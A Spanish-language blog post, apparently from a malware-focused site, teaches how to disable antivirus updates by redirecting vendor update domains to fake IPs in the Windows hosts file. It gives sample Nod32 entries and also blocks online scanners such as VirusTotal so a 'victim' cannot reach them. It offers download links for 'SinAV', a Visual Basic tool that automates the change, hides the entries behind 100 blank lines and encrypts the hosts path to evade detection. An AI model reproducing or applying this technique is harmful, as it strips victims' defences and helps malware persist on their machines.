Una de las tecnicas mas usadas para evitar la actualizaciones de los antivirus y demas programas de seguridad consiste en modificar el archivo Hosts de windows para que los antivirus al resolver los DNS donde tienen sus actualizaciones obtengan una ip falsa, y asi evitar que se actualizen.
Ahora no explicare como funciona este archivo Hosts, pero recomiendo que lean "El Pharming y sus consecuencias" para saber todo lo que necesitan saber sobre este archivo, ya que escribire como si supieran esto (es algo muy basico).
Ejemplo
El antivirus Nod32 utiliza varios servidores para realizar sus actualizaciones, entonces si agregamos cada uno de los dominios de dichos servidores al archivo hosts acompañados de una ip falsa cualquiera a su izquierda, cuando el antivirus requiera actualizacion siempre "revisara" de alguna manera el archivo host para verificar si existe alguna coincidencia del dominio requerido, y al ver que existe coincidencia con el dominio intentara conectarse a la IP que se le asigno a la izquierda del dominio, como en esa IP no se encuentran los archivos necesarios para la actualizacion, esta no podra realizarse y generara un error. En caso de que no se hubieran escrito esas lineas con los dominios de las actualizaciones y las ips falsas en el archivo Hosts windows se encargaria de resolver los host automaticamente y si fuera asi obtendria la ip real de ese dominio. Ademas hay que tener en cuenta que el antivirus prueba con distintos dominios por si no funcionan, asi que deben estar todos en el archivo hosts, porque si encuentra alguno y no esta con una ip falsa en el archivo hosts automaticamente resolvera el host y procedera a realizar las descargas de dichas actualizaciones.
IP DNS
127.0.1.1 u20.eset.com
127.0.1.1 u21.eset.com
127.0.1.1 u22.eset.com
...
Este metodo tambien puede utilizarse para evitar las webs de antivirus online como virustotal o novirusthanks, asi cada vez que la victima quiera ingresar en esas webs le de error de que no se encontro el servidor. Tambien servira por si quieren descargar antivirus de sus webs oficiales o simplemente no podran pedir versiones trials, porque para ello necesitan autorizacion del servidor y nunca se podra establecer la conexion.
Proyecto SinAV
SinAV es un proyecto en Visual Basic 6 que hace la tarea automatica de agregar los DNS e ips falsas al archivo Hosts, se trato de agregar los DNS de las descargas de los antivirus mas usados, ademas se agrego sus paginas oficiales y mas servidores como por ejemplo para compras o descargas de pruebas y algunos por ubicacion, como .com.ar o .es, tambien pueden encontrar algunas webs de escaneo online, esta optimizado para funcionar en Win XP, 2000, 2003, NT, y en Vista con permisos de administrador (pueden usar el vista UAC maker).
La aplicacion ademas agrega 100 lineas vacias antes de agregar los DNS y las IPS, para confundir a la victima, y se cierra al terminar de agregar todas las lineas. Se utiliza un timer y La direccion del archivo Host esta encriptada para evitar los antivirus, de nada sirve esto si es detectado jaja.
Obiamente pueden agregarle mas funciones al proyecto y modificarlo como quieran.
Descarga codigo fuente + compilado
SinAV - Evitar actualizacion de los antivirus (rapidshare)
SinAV - Evitar actualizacion de los antivirus (megaupload)
pass: troyanosyvirus.com.ar
